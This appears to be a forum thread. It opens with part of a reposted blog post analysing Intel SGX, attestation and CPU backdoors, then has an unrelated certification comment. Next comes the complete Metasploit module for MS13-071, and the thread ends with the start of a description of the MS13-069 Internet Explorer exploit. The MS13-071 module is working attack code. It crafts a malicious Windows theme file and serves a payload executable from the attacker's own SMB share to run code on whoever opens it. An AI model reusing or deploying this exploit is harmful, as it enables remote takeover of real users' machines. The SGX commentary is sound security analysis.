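# Back inside the enclave: unwrap. The plaintext key exists only here.
unwrapped = loader_key.private_decrypt(
  wrapped_key, OpenSSL::PKey::RSA::PKCS1_OAEP_PADDING)
```

On its own, of course, nothing here stops an active attacker from substituting his own public key in transit; that is the man-in-the-middle problem the post addresses next.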
This is almost good, except for the fact that this scheme is not immune to a classic man-in-the-middle attack. The solution is easy, though: if I understand correctly the description of the new Quoting and Sealing operations performed by the Quoting Enclave, we can include the hash of the generated public key as part of the data that gets signed and put into the Quote message, so the remote server can also be assured that the public key originates from the actual code running in the SGX enclave and not from Mallory somewhere in the middle.

So, what does the application really do? Does it do exactly what has been advertised by its author? Or does it also "accidentally" sniff some system memory, or even read out disk sectors, and send the gathered data to a remote server, encrypted, of course? We cannot know. And that's quite worrying, I think. One might say that we accept all proprietary software blindly anyway; after all, who fires up IDA to review MS Office before use? Or MS Windows? Or any other application? Probably very few people indeed. But the point is: it could be done, and some brave souls actually do it. It could be done even if the author used some advanced form of obfuscation. It can be done, even if it takes lots of time. Now, with Intel SGX, it suddenly cannot be done anymore. That's quite a revolution, a complete change of the rules. We're no longer the masters of our little universe, the computer system; now somebody else is. Unless there was a way for "Certified Antivirus companies" to get around SGX protection... (see below for more discussion on this).

...And some good applications of SGX

SGX blackboxing has, however, some good usages too, beyond protecting Hollywood productions and making malware un-analyzable... One particularly attractive possibility is the "trusted cloud", where the VMs offered to users could not be eavesdropped on or tampered with by the cloud provider's admins.
I wrote about such a possibility two years ago, but with Intel SGX this could be done much, much better. It will, of course, require a specially written hypervisor which sets up an SGX container for each VM; the VM could then authenticate to the user and prove, via remote attestation, that it is executing inside a properly set up SGX enclave. Note how this time we do not require the hypervisor to authenticate to the users: we just don't care; if our code correctly attests that it is in a correct SGX enclave, all is fine. Suddenly Google could no longer collect and process your calendar, email, documents, and medical records! Or how about a Tor node that could prove to users that it is not backdoored by its own admin and does not keep a log of how connections were routed? Or a safe Bitcoin web-based wallet? It's hard to overestimate how good such a technology might be for bringing privacy to the wider society of users... Assuming, of course, there was no backdoor for the NSA to get around the SGX protection and ruin all this goodness... (see below for more discussion on this).

New OS and VMM architectures

In the paragraph above I mentioned that we will need specially written hypervisors (VMMs) that make use of SGX in order to protect the users' VMs against the hypervisors themselves. We could go further and put other components of a VMM into protected SGX enclaves: things that we currently, in Qubes OS, keep in separate Service VMs, such as networking stacks, USB stacks, etc. Remember that Intel SGX provides a convenient mechanism to build inter-enclave secure communication channels. We could also take the "GUI domain" (currently this is just Dom0 in Qubes OS) and move it into a separate SGX enclave. If only Intel came up with solid protected input and output technologies that worked well with SGX, then this would suddenly make a whole lot of sense (unlike currently, where it is very challenging).
What we win this way is that a bug in the hypervisor should no longer be critical, as an attacker who compromised the hypervisor would now have a long way to go to steal any real secret of the user, because there are no secrets in the hypervisor itself. In this setup the two most critical enclaves are: 1) the GUI enclave, of course, and 2) the admin enclave, although it is thinkable that the latter could be made reasonably deprivileged, in that it might only be allowed to create and remove VMs and set up networking and other policies for them, but no longer be able to read and write the memory of the VMs (Anti Snowden Protection, ASP?).

And... why use hypervisors? Why not use the same approach to compartmentalize ordinary operating systems? Well, this could be done, of course, but it would require a considerable rewrite of the systems, essentially turning them into microkernels (except for the fact that the microkernel would no longer need to be trusted), as well as of the applications and drivers, and we know that this will never happen. Again, let me repeat one more time: the whole point of using virtualization for security is that it wraps up all the huge APIs of an ordinary OS, like Win32 or POSIX or OS X, into a virtual machine that itself requires an orders-of-magnitude simpler interface to/from the outside world (especially true for paravirtualized VMs), and all this without the need to rewrite the applications.

Trusting Intel – Next Generation of Backdooring?

We have seen that SGX offers a number of attractive features that could potentially make our digital systems more secure and 3rd party servers more trusted. But does it really? The obvious question, especially in the light of recent revelations about the NSA backdooring everything and the kitchen sink, is whether Intel will have backdoors allowing "privileged entities" to bypass SGX protections.

Traditional CPU backdooring

Of course they could, no question about it.
But one can say that Intel (as well as AMD) might have had backdoors in their processors for a long time, not necessarily in anything related to SGX, TPM, TXT, AMT, etc. Intel could have built backdoors into simple MOV or ADD instructions, in such a way that they would automatically disable ring/page protections whenever executed with some magic arguments. I wrote more about this many years ago. The problem with those "traditional" backdoors is that Intel (or a certain agency) could be caught using them, and this might have catastrophic consequences for Intel. Just imagine somebody discovered (during a forensic analysis of an incident) that doing:

MOV eax, $deadbeef
MOV ebx, $babecafe
ADD eax, ebx

...causes ring elevation for the next 1000 cycles. All the processors affected would suddenly become equivalents of the old 8086 and would have to be replaced. Quite a marketing nightmare, I think, no?

Next-generation CPU backdooring

But as more and more crypto and security mechanisms get delegated from software to the processor, the more likely it becomes for Intel (or AMD) to insert really "plausibly deniable" backdoors into processors. Consider e.g. the recent paper on how to plant a backdoor into Intel's Ivy Bridge random number generator (usable via the new RDRAND instruction). The backdoor reduces the actual entropy of the generator, making it feasible to later brute-force any crypto which uses keys generated via the weakened generator. The paper goes to great lengths describing how this backdoor could be injected by a malicious foundry (e.g. one in China), behind Intel's back, which is achieved by implementing the backdoor entirely below the HDL level. The paper takes a "classic" view on the threat model, with Good Americans (Intel engineers) and Bad Chinese (foundry operators/employees).
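To see why even a modest entropy reduction is fatal, here is a toy model in Ruby (mine, not the paper's actual dopant-level construction): a generator that emits 128-bit values which secretly depend on only 16 bits of internal state can be exhausted instantly by anyone who knows about the flaw, while its outputs still look perfectly random from the outside.

```ruby
require 'openssl'

# Toy model of a backdoored RNG: 128-bit outputs, but only 16 bits of
# effective entropy hidden inside. Illustrative only.
def weakened_rng(hidden_state) # hidden_state in 0...2**16
  OpenSSL::Digest.digest('SHA256', [hidden_state].pack('n'))[0, 16]
end

# The victim derives a "128-bit" key, believing it to be strong.
victim_key = weakened_rng(rand(2**16))

# An attacker who knows the backdoor enumerates all 65536 possible states.
recovered_state = (0...2**16).find { |s| weakened_rng(s) == victim_key }
```

That is 65536 hash computations for the attacker, versus the 2^128 work factor the victim believes in, and no statistical test on the outputs alone will reveal the difference.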
Nevertheless, it should be obvious that Intel could have planted such a backdoor without any of the effort or challenges described in the paper, because they could do so at any level, not necessarily below HDL. But backdooring an RNG is still something that leaves traces. Even though the backdoored processors can apparently pass all external "randomness" tests, such as the NIST test suite, they still might be caught. Perhaps because somebody will buy 1000 processors, run them for a year, note down all the numbers generated, and then conclude that the distribution is not quite right. Or something like that. Or perhaps because somebody will reverse engineer the processor, specifically the RNG circuitry, and notice some gates are shorted to GND. Or perhaps because somebody at this "Bad Chinese" foundry will notice it.

Let's now get back to Intel SGX: what is the actual Root of Trust for this technology? Of course, the processor, just like for the old ring3/ring0 separation. But for SGX there is an additional Root of Trust which is used for remote attestation, and this is the private key(s) used for signing the Quote messages. If the signing private key somehow got into the hands of an adversary, the remote attestation breaks down completely. Suddenly the "SGX blackboxed" apps and malware can readily be decrypted, disassembled and reverse engineered, because the adversary can now emulate their execution step by step under a debugger and still pass the remote attestation. We might say this is good, as we don't want irreversible malware and apps. But then, suddenly, we also lose our attractive "trusted cloud": now there is nothing to stop the adversary who has the private signing key from running our trusted VM outside of SGX, yet still reporting to us that it is SGX-protected.
And so, while we believe that our trusted VM should be trusted and unsniffable, and while we entrust all our deepest secrets to it, the adversary can read them all like on a plate. And the worst thing is: even if somebody took such a processor, disassembled it into pieces, analyzed it transistor by transistor, recreated the HDL, and analyzed it all, everything would still look good. Because the backdoor is... the leaked private key that is now also in the hands of the adversary, and there is no way to prove that by looking at the processor alone.

As I understand it, the whole idea of having a separate TPM chip was exactly to make such backdooring-by-leaking-keys more difficult, because, while we're all forced to use Intel or AMD processors today, it is possible that e.g. every country could produce its own TPM, as it's a million times less complex than a modern processor. So, perhaps Russia could use their own TPMs, for which they might be reasonably sure the private keys have not been handed over to the NSA. However, as I mentioned in the first part of this article, sadly, this scheme doesn't work that well. The processor can still cheat the external TPM module. For example, in the case of Intel TXT and TPM, the processor can produce incorrect PCR values in response to a certain trigger; in that case it no longer matters that the TPM is trusted and the keys not leaked, because the TPM will sign wrong values. On the other hand, we are now back to using "traditional" backdoors in the processors, whose main disadvantage is that people might get caught using them (e.g. somebody might analyze an exploit which turns out to be triggering a correct Quote message despite incorrect PCRs). So, perhaps the idea of a separate TPM actually does make some sense after all?

What about just accidental bugs in Intel products?

Conspiracy theories aside, what about accidental bugs?
What are the chances of SGX being really foolproof, at least against those unlucky adversaries who didn't get access to the private signing keys? Intel's processors have become quite complex beasts these days. And if you also throw in the Memory Controller Hub, it's an unimaginably complex beast. Let's take a quick tour back, discussing some spectacular attacks against Intel "hardware" security mechanisms. I write "hardware" in quotation marks, because really most of these technologies are software, like most things in electronics these days. Nevertheless, "hardware enforced security" does have a special appeal to lots of people, often creating an impression that these must be some ultimate, unbreakable technologies...

I think it all started with our exploit against the Intel Q35 chipset (slides 15+), demonstrated back in 2008, which was the first attack allowing compromise of the otherwise hardware-protected SMM memory on Intel platforms (some other attacks against SMM shown before assumed the SMM was not protected, which was the case on many older platforms). This was shortly followed by another paper from us about attacking Intel Trusted Execution Technology (TXT), which found and exploited the fact that TXT-loaded code was not protected against code running in SMM mode. We used our previous attack on the Q35 against SMM, as well as a couple of new ones we found, in order to compromise SMM, plant a backdoor there, and then compromise TXT-loaded code from there. The issue highlighted in the paper has never really been correctly patched. Intel has spent years developing something they call the STM, which was supposed to be a thin hypervisor for SMM code sandboxing. I don't know if the Intel STM specification has eventually been made public, how many bugs it might introduce on systems using it, or how inaccurate it might be.
In the following years we presented two more devastating attacks against Intel TXT (neither of which depended on compromised SMM): one which exploited a subtle bug in the processor's SINIT module, allowing us to misconfigure VT-d protections for TXT-loaded code, and another exploiting a classic buffer overflow bug, also in the processor's SINIT module, allowing us this time not only to fully bypass TXT, but also to fully bypass Intel Launch Control Policy and hijack SMM (several years after our original papers on attacking SMM the old bugs had been patched, so this was also attractive as yet another way to compromise SMM for whatever other reason).

Invisible Things Lab also presented the first, and as far as I'm aware still the only, attack on an Intel BIOS that allowed reflashing the BIOS despite Intel's strong "hardware" protection mechanism intended to allow only digitally signed code to be flashed. We also found out about the secret processor in the chipset used for execution of Intel AMT code, and we found a way to inject our custom code into this special AMT environment and have it executed in parallel with the main system, unconstrained by any other entity.

This is quite a list of significant Intel security failures, which I think gives us something to think about. At the very least: just because something is "hardware enforced" or "hardware protected" doesn't mean it is foolproof against software exploits. Because, it should be clearly said, all our exploits mentioned above were pure software attacks. But, to be fair, we have never been able to break Intel's core memory protection (ring separation, page protection) or Intel VT-x.
Rafal Wojtczuk probably came closest with his SYSRET attack, in an attempt to break the ring separation, but ultimately Intel's excuse was that the problem was on the side of the OS developers, who didn't notice subtle differences in the behavior of SYSRET between AMD and Intel processors, and didn't make their kernel code defensive enough against the Intel processor's odd behavior. We have also demonstrated rather impressive attacks bypassing Intel VT-d but, again, to be fair, we should mention that the attacks were possible only on those platforms which Intel didn't equip with so-called Interrupt Remapping hardware, and that Intel knew that such hardware was indeed needed and had been planning it a few years before our attacks were published.

So, is Intel SGX going to be as insecure as Intel TXT, or as secure as Intel VT-x...?

The bottom line

Intel SGX promises some incredible functionality: the ability to create protected execution environments (called enclaves) within an untrusted (compromised) Operating System. However, for SGX to be of any use on a client OS, it is important that we also have technologies to implement trusted output and input from/to the SGX enclave. Intel currently provides few details about the former and openly admits it doesn't have the latter. Still, even without trusted input and output technologies, SGX might be very useful in bringing trust to the cloud, by allowing users to create trusted VMs inside an untrusted provider's infrastructure. However, at the same time, it could allow the creation of applications and malware that could not be reverse engineered. It's quite ironic that those two applications (trusted cloud and irreversible malware) are mutually bound together, so that if one wanted to add a backdoor to allow the A/V industry to analyze SGX-protected malware, then this very same backdoor could be used to weaken the guarantees of trustworthiness of user VMs in the cloud.
Finally, a problem that is hard to ignore today, in the post-Snowden world, is the ease of backdooring this technology by Intel itself. In fact Intel doesn't need to add anything to their processors: all they need to do is give away the private signing keys used by SGX for remote attestation. This makes for a perfectly deniable backdoor; nobody could catch Intel at it, even if the processor were analyzed transistor by transistor, HDL line by line.

As a system architect I would love to have Intel SGX, and I would love to believe it is secure. It would allow us to further decompose Qubes OS, specifically to get rid of the hypervisor from the TCB, and probably even more.

Special thanks to Oded Horowitz for turning my attention towards Intel SGX.

Posted by Joanna Rutkowska at Monday, September 23, 2013

Source: The Invisible Things Lab's blog: Thoughts on Intel's upcoming Software Guard Extensions (Part 2)
  14. I have this one: https://www.microsoft.com/learning/en-us/exam.aspx?id=70-660&locale=en-us Well, I didn't pay anything for it, but it costs about 50 dollars anyway (for students), which I don't think is much. If you want to take a Microsoft certification, talk to the MSP (Microsoft Student Partners) people at your university.
  15. MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution

Authored by Eduardo Prado, juan vazquez | Site metasploit.com

This Metasploit module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the "Screen Saver" tab is viewed.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::SMBServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability mainly affecting Microsoft Windows XP
        and Windows 2003. The vulnerability exists in the handling of the Screen
        Saver path, in the [boot] section. An arbitrary path can be used as screen
        saver, including a remote SMB resource, which allows for remote code
        execution when a malicious .theme file is opened, and the "Screen Saver"
        tab is viewed.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Eduardo Prado', # Vulnerability discovery
          'juan vazquez'   # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2013-0810'],
          ['OSVDB', '97136'],
          ['MSB', 'MS13-071'],
          ['BID', '62176']
        ],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => 'false'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP SP3 / Windows 2003 SP2', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Sep 10 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The theme file', 'msf.theme']),
        OptString.new('UNCPATH', [ false, 'Override the UNC path to use (Ex: \\\\192.168.1.1\\share\\exploit.scr)' ])
      ], self.class)
  end

  def exploit
    if (datastore['UNCPATH'])
      @unc = datastore['UNCPATH']
      print_status("Remember to share the malicious EXE payload as #{@unc}")
    else
      print_status("Generating our malicious executable...")
      @exe = generate_payload_exe

      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
      @share = rand_text_alpha(5 + rand(5))
      @scr_file = "#{rand_text_alpha(5 + rand(5))}.scr"
      @hi, @lo = UTILS.time_unix_to_smb(Time.now.to_i)
      @unc = "\\\\#{my_host}\\#{@share}\\#{@scr_file}"
    end

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    # Default Windows XP / 2003 theme modified
    theme = <<-EOF
; Copyright © Microsoft Corp. 1995-2001

[Theme]
DisplayName=@themeui.dll,-2016

; My Computer
[CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\DefaultIcon]
DefaultValue=%WinDir%explorer.exe,0

; My Documents
[CLSID\\{450D8FBA-AD25-11D0-98A8-0800361B1103}\\DefaultIcon]
DefaultValue=%WinDir%SYSTEM32\\mydocs.dll,0

; My Network Places
[CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\DefaultIcon]
DefaultValue=%WinDir%SYSTEM32\\shell32.dll,17

; Recycle Bin
[CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\DefaultIcon]
full=%WinDir%SYSTEM32\\shell32.dll,32
empty=%WinDir%SYSTEM32\\shell32.dll,31

[Control Panel\\Desktop]
Wallpaper=
TileWallpaper=0
WallpaperStyle=2
Pattern=
ScreenSaveActive=0

[boot]
SCRNSAVE.EXE=#{@unc}

[MasterThemeSelector]
MTSM=DABJDKT
    EOF

    file_create(theme)
    print_good("Let your victim open #{datastore['FILENAME']}")

    if not datastore['UNCPATH']
      print_status("Ready to deliver your payload on #{@unc}")
      super
    end
  end

  # TODO: these smb_* methods should be moved up to the SMBServer mixin
  # development and test on progress
  def smb_cmd_dispatch(cmd, c, buff)
    smb = @state[c]
    vprint_status("Received command #{cmd} from #{smb[:name]}")

    pkt = CONST::SMB_BASE_PKT.make_struct
    pkt.from_s(buff)

    # Record the IDs
    smb[:process_id]   = pkt['Payload']['SMB'].v['ProcessID']
    smb[:user_id]      = pkt['Payload']['SMB'].v['UserID']
    smb[:tree_id]      = pkt['Payload']['SMB'].v['TreeID']
    smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID']

    case cmd
    when CONST::SMB_COM_NEGOTIATE
      smb_cmd_negotiate(c, buff)
    when CONST::SMB_COM_SESSION_SETUP_ANDX
      wordcount = pkt['Payload']['SMB'].v['WordCount']
      if wordcount == 0x0D # It's the case for Share Security Mode sessions
        smb_cmd_session_setup(c, buff)
      else
        vprint_status("SMB Capture - #{smb[:ip]} Unknown SMB_COM_SESSION_SETUP_ANDX request type , ignoring...")
        smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS)
      end
    when CONST::SMB_COM_TRANSACTION2
      smb_cmd_trans(c, buff)
    when CONST::SMB_COM_NT_CREATE_ANDX
      smb_cmd_create(c, buff)
    when CONST::SMB_COM_READ_ANDX
      smb_cmd_read(c, buff)
    else
      vprint_status("SMB Capture - Ignoring request from #{smb[:name]} - #{smb[:ip]} (#{cmd})")
      smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS)
    end
  end

  def smb_cmd_negotiate(c, buff)
    pkt = CONST::SMB_NEG_PKT.make_struct
    pkt.from_s(buff)

    dialects = pkt['Payload'].v['Payload'].gsub(/\x00/, '').split(/\x02/).grep(/^\w+/)
    dialect = dialects.index("NT LM 0.12") || dialects.length-1

    pkt = CONST::SMB_NEG_RES_NT_PKT.make_struct
    smb_set_defaults(c, pkt)

    time_hi, time_lo = UTILS.time_unix_to_smb(Time.now.to_i)

    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NEGOTIATE
    pkt['Payload']['SMB'].v['Flags1'] = 0x88
    pkt['Payload']['SMB'].v['Flags2'] = 0xc001
    pkt['Payload']['SMB'].v['WordCount'] = 17
    pkt['Payload'].v['Dialect'] = dialect
    pkt['Payload'].v['SecurityMode'] = 2 # SHARE Security Mode
    pkt['Payload'].v['MaxMPX'] = 50
    pkt['Payload'].v['MaxVCS'] = 1
    pkt['Payload'].v['MaxBuff'] = 4356
    pkt['Payload'].v['MaxRaw'] = 65536
    pkt['Payload'].v['SystemTimeLow'] = time_lo
    pkt['Payload'].v['SystemTimeHigh'] = time_hi
    pkt['Payload'].v['ServerTimeZone'] = 0x0
    pkt['Payload'].v['SessionKey'] = 0
    pkt['Payload'].v['Capabilities'] = 0x80f3fd
    pkt['Payload'].v['KeyLength'] = 8
    pkt['Payload'].v['Payload'] = Rex::Text.rand_text_hex(8)

    c.put(pkt.to_s)
  end

  def smb_cmd_session_setup(c, buff)
    pkt = CONST::SMB_SETUP_RES_PKT.make_struct
    smb_set_defaults(c, pkt)

    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX
    pkt['Payload']['SMB'].v['Flags1'] = 0x88
    pkt['Payload']['SMB'].v['Flags2'] = 0xc001
    pkt['Payload']['SMB'].v['WordCount'] = 3
    pkt['Payload'].v['AndX'] = 0x75
    pkt['Payload'].v['Reserved1'] = 00
    pkt['Payload'].v['AndXOffset'] = 96
    pkt['Payload'].v['Action'] = 0x1 # Logged in as Guest
    pkt['Payload'].v['Payload'] =
      Rex::Text.to_unicode("Unix", 'utf-16be') + "\x00\x00" +         # Native OS # Samba signature
      Rex::Text.to_unicode("Samba 3.4.7", 'utf-16be') + "\x00\x00" +  # Native LAN Manager # Samba signature
      Rex::Text.to_unicode("WORKGROUP", 'utf-16be') + "\x00\x00\x00"  # Primary DOMAIN # Samba signature

    tree_connect_response = ""
    tree_connect_response << [7].pack("C")    # Tree Connect Response : WordCount
    tree_connect_response << [0xff].pack("C") # Tree Connect Response : AndXCommand
    tree_connect_response << [0].pack("C")    # Tree Connect Response : Reserved
    tree_connect_response << [0].pack("v")    # Tree Connect Response : AndXOffset
    tree_connect_response << [0x1].pack("v")  # Tree Connect Response : Optional Support
    tree_connect_response << [0xa9].pack("v") # Tree Connect Response : Word Parameter
    tree_connect_response << [0x12].pack("v") # Tree Connect Response : Word Parameter
    tree_connect_response << [0].pack("v")    # Tree Connect Response : Word Parameter
    tree_connect_response << [0].pack("v")    # Tree Connect Response : Word Parameter
    tree_connect_response << [13].pack("v")   # Tree Connect Response : ByteCount
    tree_connect_response << "A:\x00"         # Service
    tree_connect_response << "#{Rex::Text.to_unicode("NTFS")}\x00\x00" # Extra byte parameters

    # Fix the Netbios Session Service Message Length
    # to have into account the tree_connect_response,
    # need to do this because there isn't support for
    # AndX still
    my_pkt = pkt.to_s + tree_connect_response
    original_length = my_pkt[2, 2].unpack("n").first
    original_length = original_length + tree_connect_response.length
    my_pkt[2, 2] = [original_length].pack("n")

    c.put(my_pkt)
  end

  def smb_cmd_create(c, buff)
    pkt = CONST::SMB_CREATE_PKT.make_struct
    pkt.from_s(buff)

    if pkt['Payload'].v['Payload'] =~ /#{Rex::Text.to_unicode("#{@scr_file}\x00")}/
      pkt = CONST::SMB_CREATE_RES_PKT.make_struct
      smb_set_defaults(c, pkt)

      pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX
      pkt['Payload']['SMB'].v['Flags1'] = 0x88
      pkt['Payload']['SMB'].v['Flags2'] = 0xc001
      pkt['Payload']['SMB'].v['WordCount'] = 42
      pkt['Payload'].v['AndX'] = 0xff # no further commands
      pkt['Payload'].v['OpLock'] = 0x2
      # No need to track fid here, we're just offering one file
      pkt['Payload'].v['FileID'] = rand(0x7fff) + 1 # To avoid fid = 0
      pkt['Payload'].v['Action'] = 0x1 # The file existed and was opened
      pkt['Payload'].v['CreateTimeLow'] = @lo
      pkt['Payload'].v['CreateTimeHigh'] = @hi
      pkt['Payload'].v['AccessTimeLow'] = @lo
      pkt['Payload'].v['AccessTimeHigh'] = @hi
      pkt['Payload'].v['WriteTimeLow'] = @lo
      pkt['Payload'].v['WriteTimeHigh'] = @hi
      pkt['Payload'].v['ChangeTimeLow'] = @lo
      pkt['Payload'].v['ChangeTimeHigh'] = @hi
      pkt['Payload'].v['Attributes'] = 0x80 # Ordinary file
      pkt['Payload'].v['AllocLow'] = 0x100000
      pkt['Payload'].v['AllocHigh'] = 0
      pkt['Payload'].v['EOFLow'] = @exe.length
      pkt['Payload'].v['EOFHigh'] = 0
      pkt['Payload'].v['FileType'] = 0
      pkt['Payload'].v['IPCState'] = 0x7
      pkt['Payload'].v['IsDirectory'] = 0

      c.put(pkt.to_s)
    else
      pkt = CONST::SMB_CREATE_RES_PKT.make_struct
      smb_set_defaults(c, pkt)

      pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX
      pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000034 # OBJECT_NAME_NOT_FOUND
      pkt['Payload']['SMB'].v['Flags1'] = 0x88
      pkt['Payload']['SMB'].v['Flags2'] = 0xc001

      c.put(pkt.to_s)
    end
  end

  def smb_cmd_read(c, buff)
    pkt = CONST::SMB_READ_PKT.make_struct
    pkt.from_s(buff)

    offset = pkt['Payload'].v['Offset']
    length = pkt['Payload'].v['MaxCountLow']

    pkt = CONST::SMB_READ_RES_PKT.make_struct
    smb_set_defaults(c, pkt)

    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_READ_ANDX
    pkt['Payload']['SMB'].v['Flags1'] = 0x88
    pkt['Payload']['SMB'].v['Flags2'] = 0xc001
    pkt['Payload']['SMB'].v['WordCount'] = 12
    pkt['Payload'].v['AndX'] = 0xff # no more commands
    pkt['Payload'].v['Remaining'] = 0xffff
    pkt['Payload'].v['DataLenLow'] = length
    pkt['Payload'].v['DataOffset'] = 59
    pkt['Payload'].v['DataLenHigh'] = 0
    pkt['Payload'].v['Reserved3'] = 0
    pkt['Payload'].v['Reserved4'] = 6
    pkt['Payload'].v['ByteCount'] = length
    pkt['Payload'].v['Payload'] = @exe[offset, length]

    c.put(pkt.to_s)
  end

  def smb_cmd_trans(c, buff)
    pkt = CONST::SMB_TRANS2_PKT.make_struct
    pkt.from_s(buff)

    sub_command = pkt['Payload'].v['SetupData'].unpack("v").first

    case sub_command
    when 0x5 # QUERY_PATH_INFO
      smb_cmd_trans_query_path_info(c, buff)
    when 0x1 # FIND_FIRST2
      smb_cmd_trans_find_first2(c, buff)
    else
      pkt = CONST::SMB_TRANS_RES_PKT.make_struct
      smb_set_defaults(c, pkt)

      pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2
      pkt['Payload']['SMB'].v['Flags1'] = 0x88
      pkt['Payload']['SMB'].v['Flags2'] = 0xc001
      pkt['Payload']['SMB'].v['ErrorClass'] = 0xc0000225 # NT_STATUS_NOT_FOUND

      c.put(pkt.to_s)
    end
  end

  def smb_cmd_trans_query_path_info(c, buff)
    pkt = CONST::SMB_TRANS2_PKT.make_struct
    pkt.from_s(buff)

    if pkt['Payload'].v['SetupData'].length < 16
      # if QUERY_PATH_INFO_PARAMETERS doesn't include a file name,
      # return a Directory answer
      pkt = CONST::SMB_TRANS_RES_PKT.make_struct
      smb_set_defaults(c, pkt)

      pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2
      pkt['Payload']['SMB'].v['Flags1'] = 0x88
      pkt['Payload']['SMB'].v['Flags2'] = 0xc001
      pkt['Payload']['SMB'].v['WordCount'] = 10
      pkt['Payload'].v['ParamCountTotal'] = 2
      pkt['Payload'].v['DataCountTotal'] = 40
      pkt['Payload'].v['ParamCount'] = 2
      pkt['Payload'].v['ParamOffset'] = 56
      pkt['Payload'].v['DataCount'] = 40
      pkt['Payload'].v['DataOffset'] = 60
      pkt['Payload'].v['Payload'] =
        "\x00" + # Padding
        # QUERY_PATH_INFO Parameters
        "\x00\x00" + # EA Error Offset
        "\x00\x00" + # Padding
        # QUERY_PATH_INFO Data
        [@lo, @hi].pack("VV") + # Created
        [@lo, @hi].pack("VV") + # Last Access
        [@lo, @hi].pack("VV") + # Last Write
        [@lo, @hi].pack("VV") + # Change
        "\x10\x00\x00\x00" + # File attributes => directory
        "\x00\x00\x00\x00" # Unknown

      c.put(pkt.to_s)
    else
      # if QUERY_PATH_INFO_PARAMETERS includes a file name,
      # returns an object name not found error
      pkt = CONST::SMB_TRANS_RES_PKT.make_struct
      smb_set_defaults(c, pkt)

      pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2
pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000034 #OBJECT_NAME_NOT_FOUND pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 c.put(pkt.to_s) end end def smb_cmd_trans_find_first2(c, buff) pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) file_name = Rex::Text.to_unicode(@scr_file) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 10 pkt['Payload'].v['ParamCountTotal'] = 10 pkt['Payload'].v['DataCountTotal'] = 94 + file_name.length pkt['Payload'].v['ParamCount'] = 10 pkt['Payload'].v['ParamOffset'] = 56 pkt['Payload'].v['DataCount'] = 94 + file_name.length pkt['Payload'].v['DataOffset'] = 68 pkt['Payload'].v['Payload'] = "\x00" + # Padding # FIND_FIRST2 Parameters "\xfd\xff" + # Search ID "\x01\x00" + # Search count "\x01\x00" + # End Of Search "\x00\x00" + # EA Error Offset "\x00\x00" + # Last Name Offset "\x00\x00" + # Padding #QUERY_PATH_INFO Data [94 + file_name.length].pack("V") + # Next Entry Offset "\x00\x00\x00\x00" + # File Index [@lo, @hi].pack("VV") + # Created [@lo, @hi].pack("VV") + # Last Access [@lo, @hi].pack("VV") + # Last Write [@lo, @hi].pack("VV") + # Change [@exe.length].pack("V") + "\x00\x00\x00\x00" + # End Of File "\x00\x00\x10\x00\x00\x00\x00\x00" + # Allocation size "\x80\x00\x00\x00" + # File attributes => directory [file_name.length].pack("V") + # File name len "\x00\x00\x00\x00" + # EA List Lenght "\x00" + # Short file lenght "\x00" + # Reserved ("\x00" * 24) + file_name c.put(pkt.to_s) end end Sursa: MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution ? Packet Storm
  16. MS13-069 Microsoft Internet Explorer CCaret Use-After-Free

Authored by corelanc0d3r, sinn3r | Site metasploit.com

This Metasploit module exploits a use-after-free vulnerability found in Internet Explorer, specifically in how the browser handles the caret (text cursor) object. In IE's standards mode, the caret handling's vulnerable state can be triggered by first setting up an editable page with an input field, and then forcing the caret to update in an onbeforeeditfocus event by setting the body's innerHTML property. In this event handler, mshtml!CCaret::`vftable' can be freed using a document.write() function; however, mshtml!CCaret::UpdateScreenCaret remains unaware of this change and still uses the same reference to the CCaret object. When the function tries to use this invalid reference to call a virtual function at offset 0x2c, it finally results in a crash. Precise control of the freed object allows arbitrary code execution in the context of the user.

##
